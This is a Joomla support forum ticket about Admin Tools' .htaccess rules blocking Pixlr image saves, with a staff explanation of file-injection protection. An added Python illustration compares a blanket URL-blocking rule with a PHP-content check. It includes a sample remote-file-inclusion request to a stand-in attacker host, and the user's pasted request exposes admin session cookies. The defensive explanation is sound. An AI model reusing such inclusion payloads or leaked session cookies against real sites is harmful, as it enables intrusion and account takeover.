#18057 Pixlr not able to save file due to .htaccess maker

Posted in ‘Admin Tools for Joomla! 4 & 5’

Environment Information

Joomla! version: n/a
PHP version: n/a
Admin Tools version: n/a

Latest post by nicholas on Wednesday, 06 November 2013 02:54 CST

user72385
Hi !

Mandatory information about my setup:

Have I read the related troubleshooter articles above before posting (which pages?)? YES
Have I searched the tickets before posting? YES
Have I read the documentation before posting (which pages?)? YES

Website: www.franckphoto.fr/administrator?v1=1
Joomla! version: 3.1.5
PHP version: 5.4.6
MySQL version: 5.1.66-0+squeeze1-log
Host: OVH
Admin Tools version: 2.5.8

Description of my issue:

First, thanks for the fantastic job on Akeeba and Admintools
Can't work without them both.

My problem: I'm now using .htaccess maker on all my sites for security reasons.
The problem is that if I do, then when I use Pixlr to transform images, I have the following error appearing:

    403 FORBIDDEN
    Forbidden

    You don't have permission to access /administrator/index.php on this server.

To use this great picture editor, I usually install the Media Manager 'Asikart Remote Image'. Then, when browsing images, I can just right-click on any image and select 'Edit with Pixlr'. The image is then loaded by Pixlr's services. I can make the changes. But if I try to save them, I get the error mentioned above...

I of course tried to generate new .htaccess files with different exceptions on the /administrator/index.php or even on the directory itself. I also tried to disable the Backend protection and other things in the Admintool .htaccess maker.

But I never managed to generate an .htaccess file that does the trick.

If I roll back to the original .htaccess created by Joomla, everything works, so it is necessarily in the optimized .htaccess by Admintools that something is going on...

Could you help me on this?
I would like to avoid rolling back permanently to the original .htaccess, as it doesn't sound very secure....


Many thanks in advance,
Dominique

dlb
You just need to do a little digging to figure out exactly what file is throwing the 403 error. The way you have it set up is that everything needs to be called through Joomla!'s index.php file. That plugin is being called outside the normal way and it needs to be added as an exception. To find out exactly what needs to be in the exception box, use the instructions here: https://www.akeebabackup.com/documentation/troubleshooter/athtaccessexceptions.html.


Dale L. Brackin
Support Specialist


English: native


Please keep in mind my timezone and cultural differences when reading my replies. Thank you!


My time zone is EST (UTC -5), Philadelphia, PA

user72385
Hi,

Thanks for your email, but in the end this didn't really help me. I had already tried plenty of things before writing to you, and did all the exception trials then. I even disabled the Frontend and the Backend protections: the problem was still there....

I tried more things, without trying to understand what the problematic element was via Firebug (it looks like it is index.php!! Please check the URL found via Firebug, provided below...)

The result of my search is that I have to disable the following option:
'Protect against common file injection attacks'... I can leave all the other options on 'On', but I have to disable this 'Protect against common...'.

What do you think about this? I don't really feel comfortable with disabling this protection... Is it a bad sign? Can this really be a problem? Does it leave an 'open door' to attacks... In a nutshell: what is your advice? If it's not too much of a problem, knowing that the rest of the options are 'on', then it would be great, as I would really like to use Pixlr...

Maybe I can add the protections set in the standard Joomla .htaccess in the field 'Custom .htaccess rules at the bottom of the file', as those were apparently not a problem.... Would this be acceptable security-wise?

Many thanks in advance for your advice here,

Best
Dominique


FOR YOUR INFO, THE URL FOUND VIA FIREBUG:

'http://www.franckphoto.fr/administrator/index.php?option=com_remoteimage&task=manager&cmd=pixlr&target=l1_RGlhcG9yYW1hX2FjY3VlaWw&node=elfinder&image=http://app8.pixlr.com/_temp/52794cecc6ba5d337d000081.jpg&type=jpg&title=pixlr_VENDANGES%202012%2060&state=replace' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-gb,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: dd00b3e33e80a06d2eefdd87b73394f3=927d2lsfj0j7ftmta459vc4cb7; mailplanBAK=R2555565549; mailplan=R3196047616; 4ffe4719afca3f83f4e5d27fd1adb723=7blo58cacahuhdpak2oofbeta2; __utma=89048396.677514011.1383680086.1383680086.1383680086.1; __utmb=89048396.4.10.1383680086; __utmc=89048396; __utmz=89048396.1383680086.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)' -H 'Host: www.franckphoto.fr' -H 'Referer: http://pixlr.com/editor/?image=http%3A%2F%2Fwww.franckphoto.fr%2Fimages%2FDiaporama_accueil%2FVENDANGES%25202012%252060.jpg&target=http%3A%2F%2Fwww.franckphoto.fr%2Fadministrator%2Findex.php%3Foption%3Dcom_remoteimage%26task%3Dmanager%26cmd%3Dpixlr%26target%3Dl1_RGlhcG9yYW1hX2FjY3VlaWw%26node%3Delfinder&title=pixlr_VENDANGES%202012%2060.jpg&exit=http%3A%2F%2Fwww.franckphoto.fr%2Fadministrator%2Findex.php%3Foption%3Dcom_remoteimage%26task%3Dmanager%26cmd%3Dpixlr' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0'

dlb
I would like to ask Nicholas if he has any experience with this extension. It is pretty late in his part of the world now.



nicholas
Akeeba Staff
Manager
This is correct, you need to disable the common file injections protection. This feature works by blocking all incoming requests which contain a URL. Even an image URL. If you have enabled the Direct File Inclusions protection (DFIShield) in Admin Tools' WAF Configuration page you already have more than adequate protection. DFIShield will only block requests like that if the file in the provided URL contains PHP code.

Nicholas K. Dionysopoulos

Lead Developer and Director

🇬🇷Greek: native 🇬🇧English: excellent 🇫🇷French: basic • 🕐 My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!
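The difference Nicholas describes, a blanket rule that rejects any request carrying a URL in its query string versus a content check that only rejects when the referenced file contains PHP code, is easy to see with a small model of each rule run over sample requests. The Python below is an added illustration written for this thread; it is not Admin Tools' rule set, not DFIShield, and not the ticket author's code. The regular expressions are assumptions approximating the behaviour described in the replies, the site host is a placeholder, the Pixlr-style request is a constructed abbreviation of the one quoted in the ticket (only the app8.pixlr.com image host is taken from it), and `fake_fetch` returns constructed byte strings in place of a real download.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed approximation of the "common file injection" rule described in the
# thread: refuse a request if ANY query-string value is an absolute URL, no
# matter which path is requested or what the URL points at.
URL_VALUE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

# Assumed approximation of the content-based check the thread attributes to
# DFIShield: refuse only if the file behind the URL contains PHP code.
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def url_parameters(request_url):
    """Return (name, value) pairs whose value is an absolute URL.

    parse_qsl percent-decodes values first, so an encoded
    'http%3A%2F%2F...' is recognised the same as a plain 'http://...'.
    """
    query = urlsplit(request_url).query
    pairs = parse_qsl(query, keep_blank_values=True)
    return [(name, value) for name, value in pairs if URL_VALUE.match(value)]


def blocked_by_url_rule(request_url):
    """Blanket rule: a URL in any parameter is enough for a 403."""
    return bool(url_parameters(request_url))


def blocked_by_content_rule(request_url, fetch):
    """Content rule: 403 only if a referenced file looks like PHP source.

    `fetch` maps a URL to the bytes it would serve; here it is a stub.
    """
    return any(PHP_OPEN_TAG.search(fetch(value))
               for _, value in url_parameters(request_url))


# Constructed sample requests (placeholder host, not the site in the ticket).
# PIXLR_SAVE mirrors the shape of the save request quoted in the ticket.
SITE = "http://example.invalid"
PIXLR_SAVE = (SITE + "/administrator/index.php?option=com_remoteimage"
              "&task=manager&cmd=pixlr&node=elfinder"
              "&image=http://app8.pixlr.com/_temp/placeholder.jpg"
              "&type=jpg&state=replace")
PIXLR_SAVE_ENCODED = (SITE + "/administrator/index.php?option=com_remoteimage"
                      "&task=manager&cmd=pixlr"
                      "&image=http%3A%2F%2Fapp8.pixlr.com%2F_temp%2Fplaceholder.jpg")
PLAIN_ADMIN = SITE + "/administrator/index.php?option=com_content&view=articles"
REMOTE_INCLUDE = SITE + "/index.php?option=com_example&template=http://attacker.invalid/inc.txt"

# Constructed "remote file" bodies standing in for what a fetch would return.
REMOTE_FILES = {
    "http://app8.pixlr.com/_temp/placeholder.jpg": b"\xff\xd8\xff\xe0JFIF-constructed-image-bytes",
    "http://attacker.invalid/inc.txt": b"<?php echo 'constructed remote-include body'; ?>",
}


def fake_fetch(url):
    """Stub fetch: returns the constructed body for a known URL, else empty."""
    return REMOTE_FILES.get(url, b"")


def decide(request_url):
    """Evaluate both rules for one request so they can be compared side by side."""
    return {
        "url_rule": blocked_by_url_rule(request_url),
        "content_rule": blocked_by_content_rule(request_url, fake_fetch),
    }


if __name__ == "__main__":
    samples = [("pixlr save", PIXLR_SAVE), ("pixlr save (encoded)", PIXLR_SAVE_ENCODED),
               ("admin page", PLAIN_ADMIN), ("remote include", REMOTE_INCLUDE)]
    for label, url in samples:
        print(f"{label:22} {decide(url)}")
```

Running it shows why the ticket author could not fix this with path exceptions: the blanket rule trips on the `image=` parameter of the Pixlr save request, a harmless JPEG URL, exactly as it does on the remote-include sample, while the content rule passes the Pixlr request and still rejects the request whose referenced file carries a PHP open tag. Note also that the check runs on decoded values, so the percent-encoded variant is treated the same as the plain one.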

Support Information

Working hours: We are open Monday to Friday, 9am to 7pm Cyprus timezone (EET / EEST). Support is provided by the same developers writing the software, all of which live in Europe. You can still file tickets outside of our working hours, but we cannot respond to them until we're back at the office.

Support policy: We would like to kindly inform you that when using our support you have already agreed to the Support Policy which is part of our Terms of Service. Thank you for your understanding and for helping us help you!